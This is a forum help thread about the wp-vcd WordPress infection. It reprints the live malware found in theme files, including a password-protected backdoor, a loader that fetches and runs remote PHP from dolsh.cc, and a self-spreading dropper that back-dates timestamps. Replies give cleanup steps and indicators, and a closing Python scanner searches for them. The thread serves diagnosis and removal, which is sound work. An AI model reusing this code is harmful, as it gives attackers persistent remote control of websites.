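What is this code in my theme's functions.php? if (isset($_REQUEST['action']) && isset($_REQUEST['password'])

Date: 2017-10-01 Author: Topy

This code appears in my theme's functions.php, and also in the child theme's. I deleted it twice, but it came back. What is it?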

if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
    $div_code_name = "wp_vcd";
    switch ( $_REQUEST['action'] ) {
        case 'change_domain';
            if ( isset( $_REQUEST['newdomain'] ) ) {

                if ( ! empty( $_REQUEST['newdomain'] ) ) {
                    if ( $file = @file_get_contents( __FILE__ ) ) {
                        if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {

                            $file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
                            @file_put_contents( __FILE__, $file );
                            print "true";
                        }

                    }
                }
            }
            break;

        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die( "" );
}


if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
    if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
        if ( $tmpcontent = @file_get_contents( "http://www.dolsh.cc/code4.php?i=" . $path ) ) {
            function theme_temp_setup( $phpCode ) {
                $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
                $handle   = fopen( $tmpfname, "w+" );
                fwrite( $handle, "<?php\n" . $phpCode );
                fclose( $handle );
                include $tmpfname;
                unlink( $tmpfname );

                return get_defined_vars();
            }

            extract( theme_temp_setup( $tmpcontent ) );
        }
    }
}

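4 replies
SO user: Milan Petrovic

Your website has been hacked. This is malicious code that is triggered from outside and loads more malicious content from the "www.dolsh.cc" domain.

If the content comes back after you delete it, then you have hacked files elsewhere that automatically rewrite functions.php whenever a page is loaded. You need to find and clean all infected files, and without a detailed review of the website it is impossible to know which files are infected. Most infections like this spread to different areas to make sure they are hard to remove.

You should back up the database, then reinstall from scratch WordPress and all the plugins you have, from uninfected copies. It may be that a plugin caused the infection, or the theme itself. If you downloaded plugins or themes from some illegal website (offering premium plugins for free), that is most likely the source of the infection.

SO user: Topy

I scanned the files with Wordfence. The scan showed these results:

functions.php in the Twenty Seventeen theme also contains the same code as above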

<?php
error_reporting(0);
ini_set('display_errors', 0);

$install_code = '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';

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
    foreach ($list as $_)
    {
        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
        {
            $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

            if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
            {
                if (strpos($content, 'WP_V_CD') === false)
                {
                    $content = $install_code . $content ;
                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                }
                else
                {
                    $ping = false;
                }
            }
        }
        else
        {
            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
            foreach ($list2 as $_2)
            {
                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                {
                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                    {
                        if (strpos($content, 'WP_V_CD') === false)
                        {
                            $content = $install_code . $content ;
                            @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                            touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                            $ping2 = true;
                        }
                        else
                        {
                            //$ping = false;
                        }
                    }
                }
            }
        }
    }

    if ($ping) {
        $content = @file_get_contents('http://www.dolsh.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
        @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh.cc/admin.txt'));
    }

    if ($ping2) {
        $content = @file_get_contents('http://www.dolsh.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
        @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh.cc/admin.txt'));
        //echo ABSPATH . 'wp-includes/class.wp.php';
    }
}

?><?php error_reporting(0);?>
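In the wp-includes folder, this code appears at the top of the post.php file.

<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php

In the wp-includes folder, there is a strange file, "wp-feed", containing the following lines:

  ::1
  127.0.0.1

Now I have removed the code from functions.php in all themes and from the related files, and deleted the strange file. I have noticed that the code no longer comes back.

This problem came from a plugin that I downloaded from a website offering free plugins.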

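SO user: Naman Rastogi

The code you shared points to the wp-vcd malware in WordPress sites. The main symptoms of the wp-vcd malware are spam pop-ups and spam URLs being created on the website.

Some variants of the malicious code have been found to modify core WordPress files and add new files in the /wp-includes directory.

The malware creates a backdoor that allows hackers to access your website for a long time. Hackers can exploit vulnerabilities in WordPress plugins & themes to upload the wp-vcd malware to vulnerable sites. In a PHP file in the theme, you will see some code like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

Cleaning

Method 1 – Search the server for the files usually infected by the wp-vcd hack

  • wp-includes/wp-vcd.php
  • wp-includes/wp-tmp.php
  • wp-content/themes/*/functions.php (all themes installed on the server, whether active or not)
  • class.theme-modules.php (inside the theme folder)

Method 2 – Search for string patterns found in the infected malware files

  • function wp_temp_setupx.php derna.top/code.php
  • stripos($tmpcontent, $wp_auth_key)

For reference - https://www.getastra.com/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/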

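SO user: wpgeek

If you downloaded a premium plugin for free, check it; if it has these two files, note that these files are behind this problem.

class.plugin-modules.php
class.theme-modules.php

Before installation the file is 35 KB in size; once the theme/plugin is installed and activated, it moves its code into all the wp-includes folders on the host. So it keeps living hidden in the wp-includes of all the other websites.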
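The file and string searches described in the answers above can be automated; the following is an added example, not code from any of the posters. It scans a WordPress tree for the file names and markers visible in the samples on this page and also flags files whose inode change time is much newer than their modification time, since the posted dropper calls touch() to restore the old timestamp after writing. The function names, the one-day threshold and the sample tree are assumptions made for the illustration.

```python
import os
import re
import time
from pathlib import Path

# File names and byte patterns taken from the code samples on this page.
SUSPECT_NAMES = {"wp-vcd.php", "class.theme-modules.php", "class.wp.php"}
PATTERNS = {
    "WP_V_CD marker": re.compile(rb"WP_V_CD"),
    "theme_temp_setup loader": re.compile(rb"function\s+theme_temp_setup"),
    "password-gated request": re.compile(
        rb"isset\(\s*\$_REQUEST\[\s*'action'\s*\]\s*\)\s*&&\s*"
        rb"isset\(\s*\$_REQUEST\[\s*'password'\s*\]"),
}
CTIME_SKEW = 86400  # assumed threshold: ctime more than one day after mtime


def scan_wordpress(root):
    """Return sorted (relative path, reason) findings for PHP files under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*.php") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in SUSPECT_NAMES:
            findings.append((rel, "suspect file name"))
        data = path.read_bytes()
        findings += [(rel, k) for k, rx in PATTERNS.items() if rx.search(data)]
        st = path.stat()
        # The dropper touch()es the file back to its old time after writing, so
        # mtime looks old while ctime (inode change time on Linux) is recent.
        if st.st_ctime - st.st_mtime > CTIME_SKEW:
            findings.append((rel, "ctime newer than mtime"))
    return sorted(findings)


def build_sample_site(root):
    """Constructed, inert sample tree: marker strings only, no working code."""
    bad = "wp-content/themes/bad/functions.php"
    files = {
        "wp-content/themes/clean/functions.php": b"<?php // clean theme\n",
        bad: b"<?php /* WP_V_CD */ function theme_temp_setup() {}\n",
        "wp-includes/wp-vcd.php": b"<?php // placeholder\n",
    }
    for rel, body in files.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)
    old = time.time() - 30 * 86400  # simulate the back-dated mtime
    os.utime(Path(root, bad), (old, old))
```

Call `scan_wordpress()` with the path of the WordPress root, ideally on an offline copy of the site. A ctime/mtime gap also appears after restores, archive extraction or permission changes, so treat those hits as leads for review rather than proof.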
